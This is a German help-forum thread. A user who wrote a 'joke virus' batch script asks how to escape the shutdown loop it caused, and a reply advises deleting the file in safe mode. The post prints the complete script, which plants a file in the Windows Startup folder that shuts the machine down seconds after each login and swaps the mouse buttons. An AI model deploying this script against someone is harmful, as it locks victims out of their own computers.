Computerhilfen.de Logo
Forum
Tipps
News

Selbstgemachten Virus beenden, wie?

Hi Leute,

so wie oben schon beschrieben habe ich oben einen Scherzvirus geschrieben und wollte diesen dann auch mal an meinem 2. Pc austesten. Läuft auch alles soweit gut, also vielleicht zu gut. Ich weiß leider nicht wie ich den Virus beende.
Er ist so aufgebaut, dass er 5 Sekunden nachdem ich das Passwort eingegeben habe und Windows alles hochfährt das System wieder herunterfährt (über autostart). Nur weiß ich wie gesagt leider nicht wie ich aus dieser Endlosschleife wieder heraus komme. Ich muss auch dazu sagen das ich den Virus mit Anleitung geschrieben habe.

Bei dem Virus handelt es sich um folgenden:

@echo off
color 0a

echo Dein Name lautet: %username%
echo Heute ist der: %date%
echo Es ist: %time%

echo shutdown -s -t 5 -c "ByeBye %username% :D" > "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virus.bat"
echo Rundll32 user 32, SwapMouseButton >> "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virus.bat"
echo exit>> "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virus.bat"

echo----------------------
echo Enter fuer Ende
pause > nul

cd "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
start Virus.bat
Exit

ich es kann mir jemand helfen



Antworten zu Selbstgemachten Virus beenden, wie?:

Hat dir diese Antwort geholfen?

Danke ButtonHilfreiche Antwort Button
Das eigentliche Problem ist das Runterfahren und dass die "Virus.bat" in den Startmenüs steht. Also mal im abgesicherten Modus starten und dann dort entfernen.   

« seiten lassen sich nicht öffnen, gmail funktioniert nichtdaten von einer Harddisc auf SDD übertragen »
 

Schnelle Hilfe: Hier nach ähnlichen Fragen und passenden Tipps suchen!